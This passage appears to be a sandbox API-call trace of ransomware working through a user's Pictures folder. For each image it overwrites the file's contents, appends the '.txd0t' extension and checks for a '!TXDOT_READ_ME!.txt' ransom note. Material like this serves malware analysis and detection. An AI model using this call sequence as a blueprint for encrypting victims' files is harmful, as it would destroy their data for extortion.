[0076.161] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18090, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x18090, lpOverlapped=0x0) returned 1 [0076.161] FlushFileBuffers (hFile=0x474) returned 1 [0076.169] GetProcessHeap () returned 0xe30000 [0076.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xeca148 [0076.169] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" [0076.169] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif") returned="bwUCcMWGBF1Mcn_.gif" [0076.169] StrCpyW (in: psz1=0xeca196, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.169] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.169] GetProcessHeap () returned 0xe30000 [0076.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0076.170] CloseHandle (hObject=0x474) returned 1 [0076.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bwuccmwgbf1mcn_.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bwuccmwgbf1mcn_.gif.txd0t")) returned 1 [0076.173] SetEvent (hEvent=0x40c) returned 1 [0076.173] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.195] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" [0076.195] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t" [0076.195] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned 0 [0076.195] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg", dwFileAttributes=0x80) returned 1 [0076.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\e0rul3aleh6brt_yeub0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.199] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=21503) returned 1 [0076.199] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.199] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.200] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffaa01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.200] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x53f0, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x53f0, lpOverlapped=0x0) returned 1 [0076.201] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffac10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.201] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x53f0, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x53f0, lpOverlapped=0x0) returned 1 [0076.201] FlushFileBuffers (hFile=0x46c) returned 1 [0076.208] GetProcessHeap () returned 0xe30000 [0076.208] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x126) returned 0xe9b648 [0076.208] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" [0076.208] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg") returned="e0RUl3aLEh6brT_yeUb0.jpg" [0076.208] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.208] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.208] GetProcessHeap () returned 0xe30000 [0076.208] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.209] CloseHandle (hObject=0x46c) returned 1 [0076.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\e0rul3aleh6brt_yeub0.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\e0rul3aleh6brt_yeub0.jpg.txd0t")) returned 1 [0076.210] SetEvent (hEvent=0x40c) returned 1 [0076.210] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.215] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" [0076.215] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t" [0076.215] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t") returned 0 [0076.215] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png", dwFileAttributes=0x80) returned 1 [0076.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\irue37i4votmyozqwpa.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.216] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=101713) returned 1 [0076.216] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.216] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.217] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe70af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.217] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18d50, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x18d50, lpOverlapped=0x0) returned 1 [0076.219] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe72b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.219] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18d50, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x18d50, lpOverlapped=0x0) returned 1 [0076.219] FlushFileBuffers (hFile=0x47c) returned 1 [0076.227] GetProcessHeap () returned 0xe30000 [0076.227] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0076.227] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" [0076.227] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png") returned="iRuE37I4VoTmYoZQwpA.png" [0076.227] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.227] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.227] GetProcessHeap () returned 0xe30000 [0076.227] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.227] CloseHandle (hObject=0x47c) returned 1 [0076.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\irue37i4votmyozqwpa.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\irue37i4votmyozqwpa.png.txd0t")) returned 1 [0076.231] SetEvent (hEvent=0x40c) returned 1 [0076.231] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.236] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" [0076.236] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t" [0076.236] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t") returned 0 [0076.236] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg", dwFileAttributes=0x80) returned 1 [0076.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\o7dpicwp9p.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.237] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=85273) returned 1 [0076.237] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.237] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.237] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeb0e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.238] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x14d10, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x14d10, lpOverlapped=0x0) returned 1 [0076.239] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeb2f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.239] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x14d10, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x14d10, lpOverlapped=0x0) returned 1 [0076.240] FlushFileBuffers (hFile=0x46c) returned 1 [0076.248] GetProcessHeap () returned 0xe30000 [0076.248] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1fe8 [0076.248] StrCpyW (in: psz1=0xed1fe8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" [0076.248] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg") returned="O7DPIcWP9p.jpg" [0076.248] StrCpyW (in: psz1=0xed2036, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.248] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.248] GetProcessHeap () returned 0xe30000 [0076.248] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1fe8 | out: hHeap=0xe30000) returned 1 [0076.248] CloseHandle (hObject=0x46c) returned 1 [0076.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\o7dpicwp9p.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\o7dpicwp9p.jpg.txd0t")) returned 1 [0076.251] SetEvent (hEvent=0x40c) returned 1 [0076.251] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.256] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" [0076.256] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t" [0076.256] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t") returned 0 [0076.256] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp", dwFileAttributes=0x80) returned 1 [0076.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qqo9vv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.256] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=88930) returned 1 [0076.257] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.257] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.257] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffea29e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.257] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x15b60, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x15b60, lpOverlapped=0x0) returned 1 [0076.259] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffea4a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.259] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x15b60, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x15b60, lpOverlapped=0x0) returned 1 [0076.260] FlushFileBuffers (hFile=0x47c) returned 1 [0076.268] GetProcessHeap () returned 0xe30000 [0076.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2f30 [0076.268] StrCpyW (in: psz1=0xed2f30, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" [0076.268] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp") returned="QQo9Vv.bmp" [0076.268] StrCpyW (in: psz1=0xed2f7e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.268] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.268] GetProcessHeap () returned 0xe30000 [0076.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2f30 | out: hHeap=0xe30000) returned 1 [0076.268] CloseHandle (hObject=0x47c) returned 1 [0076.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qqo9vv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qqo9vv.bmp.txd0t")) returned 1 [0076.272] SetEvent (hEvent=0x40c) returned 1 [0076.272] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.277] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" [0076.277] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t" [0076.277] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t") returned 0 [0076.278] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png", dwFileAttributes=0x80) returned 1 [0076.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\waverpzaz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.278] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=99657) returned 1 [0076.278] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.278] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.278] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe78b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.278] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18540, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x18540, lpOverlapped=0x0) returned 1 [0076.281] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7ac0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.281] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18540, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x18540, lpOverlapped=0x0) returned 1 [0076.281] FlushFileBuffers (hFile=0x460) returned 1 [0076.288] GetProcessHeap () returned 0xe30000 [0076.288] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2f30 [0076.288] StrCpyW (in: psz1=0xed2f30, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" [0076.288] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png") returned="wAVErpzAz.png" [0076.288] StrCpyW (in: psz1=0xed2f7e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.288] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.289] GetProcessHeap () returned 0xe30000 [0076.289] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2f30 | out: hHeap=0xe30000) returned 1 [0076.289] CloseHandle (hObject=0x460) returned 1 [0076.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\waverpzaz.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\waverpzaz.png.txd0t")) returned 1 [0076.292] SetEvent (hEvent=0x40c) returned 1 [0076.292] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.297] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" [0076.297] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg", psz2=".txd0t" | out: 